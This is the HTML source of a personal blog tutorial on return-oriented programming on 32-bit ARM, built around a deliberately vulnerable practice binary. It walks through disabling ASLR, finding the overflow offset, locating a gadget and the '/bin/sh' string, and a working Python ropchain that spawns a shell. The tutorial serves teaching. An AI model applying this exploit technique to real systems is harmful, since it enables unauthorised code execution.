site @ c427363015ec0781ef15cc61d31696762f448606

source for my site, found at icyphox.sh

build/blog/rop-on-arm/index.html

  1<!DOCTYPE html>
  2<html lang=en>
  3<link rel="stylesheet" href="/static/style.css" type="text/css">
  4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
  5<link rel="shortcut icon" type="image/x-icon" href="/static/favicon.ico">
  6<meta name="description" content="Making stack-based exploitation great again!">
  7<meta name="viewport" content="initial-scale=1">
  8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  9<meta content="#021012" name="theme-color">
 10<meta name="HandheldFriendly" content="true">
 11<meta name="twitter:card" content="summary_large_image">
 12<meta name="twitter:site" content="@icyphox">
 13<meta name="twitter:title" content="Return Oriented Programming on ARM (32-bit)">
 14<meta name="twitter:description" content="Making stack-based exploitation great again!">
 15<meta name="twitter:image" content="/static/icyphox.png">
 16<meta property="og:title" content="Return Oriented Programming on ARM (32-bit)">
 17<meta property="og:type" content="website">
 18<meta property="og:description" content="Making stack-based exploitation great again!">
 19<meta property="og:url" content="https://icyphox.sh">
 20<meta property="og:image" content="/static/icyphox.png">
 21<html>
 22  <title>
 23    Return Oriented Programming on ARM (32-bit)
 24  </title>
 25<script src="//instant.page/1.1.0" type="module" integrity="sha384-EwBObn5QAxP8f09iemwAJljc+sU+eUXeL9vSBw1eNmVarwhKk2F9vBEpaN9rsrtp"></script>
 26<div class="container-text">
 27  <header class="header">
 28    
 29        <a href="/">home</a>
 30        <a href="/blog">blog</a>
 31        <a href="/reading">reading</a>
 32        <a href="https://twitter.com/icyphox">twitter</a>
 33        <a href="/about">about</a>
 34
 35  </header>
 36<body> 
 37   <div class="content">
 38    <div align="left">
 39      <p> 2019-06-06 </p>
 40      <h1> Return Oriented Programming on ARM (32-bit) </h1>
 41      <h2> Making stack-based exploitation great again! </h2>
 42      <p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
 43assembly to follow along. I highly recommend
 44<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
 45Basics</a>. Once you’re
 46comfortable with it, proceed with the next bit — environment setup.</p>
 47
 48<h3 id="setup">Setup</h3>
 49
 50<p>Since we’re working with the ARM architecture, there are two options to go
 51forth with: </p>
 52
 53<ol>
 54<li>Emulate — head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU. 
 55And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
 56The scripts found inside should be self-explanatory.</li>
 57<li>Use actual ARM hardware, like an RPi.</li>
 58</ol>
 59
 60<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
 61may use <code>radare2</code>, IDA or anything else, really. All of which can be
 62trivially installed.</p>
 63
 64<p>And for the sake of simplicity, disable ASLR (writing to this file requires root):</p>
 65
 66<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> &gt; /proc/sys/kernel/randomize_va_space
 67</code></pre></div>
 68
 69<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
 70<a href="/static/files/roplevel2.c">roplevel2</a>. </p>
 71
 72<p>Compile it:</p>
 73
 74<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
 75</code></pre></div>
 76
 77<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
 78
 79<h3 id="a-primer-on-rop">A primer on ROP</h3>
 80
 81<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
 82used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code signing</strong>.
 83In essence, no code in the binary is actually modified and the entire exploit
 84is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
 85
 86<p>A gadget is essentially a small sequence of code (instructions), ending with
 87a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
 88code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
 89These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
 90to form what’s called a <strong>ropchain</strong>. At the end of a ropchain,
 91there’s generally a call to <code>system()</code>, to achieve code execution.</p>
 92
 93<p>In practice, the process of executing a ropchain is something like this:</p>
 94
 95<ul>
 96<li>confirm the existence of a stack-based buffer overflow</li>
 97<li>identify the offset at which the instruction pointer gets overwritten</li>
 98<li>locate the addresses of the gadgets you wish to use</li>
 99<li>craft your input keeping in mind the stack’s layout, and chain the addresses
100of your gadgets</li>
101</ul>
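<p>The last step can be sketched in a few lines of Python. This is only an illustration: <code>build_chain</code> is a hypothetical helper, and the offset and addresses passed to it are placeholders, not values from our binary.</p>

```python
import struct

def build_chain(offset, words, filler=b"A"):
    """Return `offset` filler bytes followed by each 32-bit word, little-endian."""
    padding = filler * offset
    chain = b"".join(struct.pack("<I", word) for word in words)
    return padding + chain

# Placeholder values: 8 bytes of padding, then two made-up gadget addresses.
payload = build_chain(8, [0x11111111, 0x22222222])
```

<p>The padding fills the buffer up to the saved return address, and every word after it is consumed by one of the gadgets in turn.</p>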
102
103<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=46&amp;t=0s">beautiful video</a> where he explains ROP using “weird machines”. 
104Check it out, it might be just what you needed for that “aha!” moment :)</p>
105
106<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
107that should put things into perspective.</p>
108
109<h3 id="exploring-our-binary">Exploring our binary</h3>
110
111<p>Start by running it, and entering any arbitrary string. On entering a fairly
112large string, say, “A” × 20, we
113see a segmentation fault occur.</p>
114
115<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
116
117<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
118
119<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
120
121<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and 
122<code>gadget</code>. Disassembling the <code>main</code> function:</p>
123
124<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
125
126<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
127to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are 
128never actually called.</p>
129
130<p>Disassembling the <code>gadget</code> function:</p>
131
132<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
133
134<p>This is fairly simple: the stack frame is set up by <code>push</code>ing <code>{r11}</code>,
135which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
136instruction in the middle. This is a <strong>gadget</strong>.</p>
137
138<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in 32-bit x86 where
139arguments to functions are passed on the stack, in ARM the first four arguments go in the registers <code>r0</code> to <code>r3</code>.
140So this gadget effectively allows us to pass an argument to
141a function using <code>r0</code>, and then jump to it by placing its address
142in <code>pc</code>. Neat.</p>
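<p>To make the effect of <code>pop {r0, pc}</code> concrete, here is a toy model in Python. It is a sketch rather than an emulator: the stack is a plain list of words, <code>pop_r0_pc</code> is a made-up name, and the two values on the stack are placeholders.</p>

```python
def pop_r0_pc(stack, sp):
    """Model `pop {r0, pc}`: the lower-numbered register takes the word at the
    lower address, so r0 is loaded first and pc second."""
    r0 = stack[sp]
    pc = stack[sp + 1]
    return r0, pc, sp + 2  # sp moves past the two words that were popped

# Placeholder stack contents: an argument, then the address to jump to.
stack = [0xdeadbeef, 0x00010000]
r0, pc, sp = pop_r0_pc(stack, 0)
```

<p>Whatever we place on the stack right after the gadget’s address therefore ends up as the first argument, and the word after that decides where execution continues.</p>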
143
144<p>Moving on to the disassembly of the <code>winner</code> function:</p>
145
146<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
147
148<p>Here, we see calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
149So our end goal here is to, quite obviously, execute code via the <code>system()</code>
150function.</p>
151
152<p>Now that we have an overview of what’s in the binary, let’s formulate a method
153of exploitation by messing around with inputs.</p>
154
155<h3 id="messing-around-with-inputs">Messing around with inputs :^)</h3>
156
157<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
158screenshot.</p>
159
160<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
161
162<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
163the <code>pc</code> has been overwritten with our input.
164So we smashed the stack alright, but more importantly, <code>0x46</code> is the letter ‘F’, so the overwrite happens at <code>FFFF</code>, 20 bytes into our input.</p>
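<p>Working out the offset by eye is easy with a short pattern, but it can also be computed. The sketch below assumes the pattern is four bytes per letter (<code>AAAABBBB…</code>), which matches the input used later in this post; the variable names are my own.</p>

```python
import struct

# Assumed pattern: four bytes per letter, so each word of input is recognisable.
pattern = "AAAABBBBCCCCDDDDEEEEFFFF"
faulting_pc = 0x46464646  # value of pc reported by gdb after the crash

# Turn the register value back into the four input bytes (little-endian).
needle = struct.pack("<I", faulting_pc).decode("ascii")
offset = pattern.index(needle)
print(needle, offset)  # FFFF 20
```

<p>Twenty bytes is presumably the 16-byte buffer plus the 4-byte saved frame pointer that sits just below the saved return address.</p>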
165
166<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
167control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
168
169<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the address
170of the second instruction, <code>add r11, sp, #4</code>. 
171We’ll use Python to print our input string, replacing <code>FFFF</code> with
172that address (<code>0x00010528</code> here). Note the endianness: the bytes are written in little-endian order.</p>
173
174<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">&#39;print(&quot;AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00&quot;)&#39;</span> <span class="p">|</span> ./rop2
175</code></pre></div>
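<p>If reversing the bytes by hand feels error-prone, Python’s <code>struct</code> module can do it. A minimal check, using the address from the command above (the variable names are illustrative):</p>

```python
import struct

winner_second_insn = 0x00010528

# "<I" means: little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", winner_second_insn)
print(packed)  # b'(\x05\x01\x00'  (0x28 is the ASCII code for '(')

# Unpacking the same bytes gives the address back.
(roundtrip,) = struct.unpack("<I", packed)
```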
176
177<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
178
179<p>The reason we don’t jump to the first instruction is that we want to control the stack
180ourselves. If we allow <code>push {r11, lr}</code> (first instruction) to occur, the program will <code>pop</code>
181those out after <code>winner</code> is done executing and we will no longer control 
182where it jumps to.</p>
183
184<p>So that didn’t do much; it just prints out the string “Nothing much here&#8230;”. 
185It <em>does</em>, however, contain a call to <code>system()</code>, which somehow needs to be given an argument
186to do what we want (run a command, execute a shell, etc.).</p>
187
188<p>To do that, we’ll follow a multi-step process: </p>
189
190<ol>
191<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
192<li>Place the address of our command string, say “<code>/bin/sh</code>”, next on the stack. This will go into
193<code>r0</code>.</li>
194<li>Then, place the address of <code>system()</code> after it. This will go into <code>pc</code>.</li>
195</ol>
196
197<p>The pseudo-code is something like this:</p>
198
199<pre><code>string = AAAABBBBCCCCDDDDEEEE
200gadget = # addr of gadget
201binsh  = # addr of /bin/sh
202system = # addr of system()
203
204print(string + gadget + binsh + system)
205</code></pre>
206
207<p>Clean and mean.</p>
208
209<h3 id="the-exploit">The exploit</h3>
210
211<p>To write the exploit, we’ll use Python and the absolute godsend of a library — <code>struct</code>.
212It allows us to pack the bytes of addresses to the endianness of our choice.
213It probably does a lot more, but who cares.</p>
214
215<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
216at <code>main</code>, hit <code>r</code> to run, and search the memory from <code>system()</code> onwards for the string “<code>/bin/sh</code>”:</p>
217
218<pre><code>(gdb) find &amp;system, +9999999, "/bin/sh"
219</code></pre>
220
221<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
222
223<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
224found from the disassemblies from earlier. Here’s the final exploit code:</p>
225
226<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
227
228<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>  <span class="c1"># &quot;&lt;I&quot;: little-endian 32-bit word</span>
229<span class="n">string</span> <span class="o">=</span> <span class="s2">&quot;AAAABBBBCCCCDDDDEEEE&quot;</span>  <span class="c1"># 20 bytes of padding up to the saved return address</span>
230<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
231<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
232
233<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
234</code></pre></div>
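<p>The script above relies on Python 2, where strings and packed bytes concatenate directly. A rough Python 3 equivalent might look like the following; treat it as a sketch. The addresses are the ones from this post and are specific to my build with ASLR disabled, and <code>build_payload</code> is just an illustrative name.</p>

```python
import struct
import sys

# Addresses copied from the post; they will differ on other systems.
GADGET = 0x00010550
BINSH = 0xb6f85588
SYSTEM = 0x00010538

def build_payload():
    """Return the padding followed by the three little-endian chain words."""
    padding = b"AAAABBBBCCCCDDDDEEEE"  # 20 bytes up to the saved return address
    chain = struct.pack("<III", GADGET, BINSH, SYSTEM)
    return padding + chain

if __name__ == "__main__":
    # print() expects text, so the raw bytes go through sys.stdout.buffer.
    sys.stdout.buffer.write(build_payload() + b"\n")
```

<p>Packing all three words with a single format string keeps the order of the chain visible in one place: gadget first, then the value for <code>r0</code>, then the value for <code>pc</code>.</p>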
235
236<p>Honestly, not too far off from our pseudo-code :)</p>
237
238<p>Let’s see it in action:</p>
239
240<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
241
242<p>Notice that it doesn’t work the first time. This is because <code>/bin/sh</code> exits
243as soon as the pipe closes, since there’s no more input coming in on STDIN.
244To get around this, we use <code>cat(1)</code>, which keeps the pipe open and relays our input
245to the shell. Nifty trick.</p>
246
247<h3 id="conclusion">Conclusion</h3>
248
249<p>This was a fairly basic challenge, with everything laid out conveniently. 
250Actual ropchaining is a little more involved, with a lot more gadgets to be chained
251to achieve code execution.</p>
252
253<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
254 
255    </div>
256    <hr />
257    <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:x@icyphox.sh">x@icyphox.sh</a>.</p>
258    <footer>
259      <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
260        <img src="https://licensebuttons.net/l/by-nc-sa/4.0/80x15.png">
261        </a>
262    </footer>
263  </body>
264  </div>
265 </html>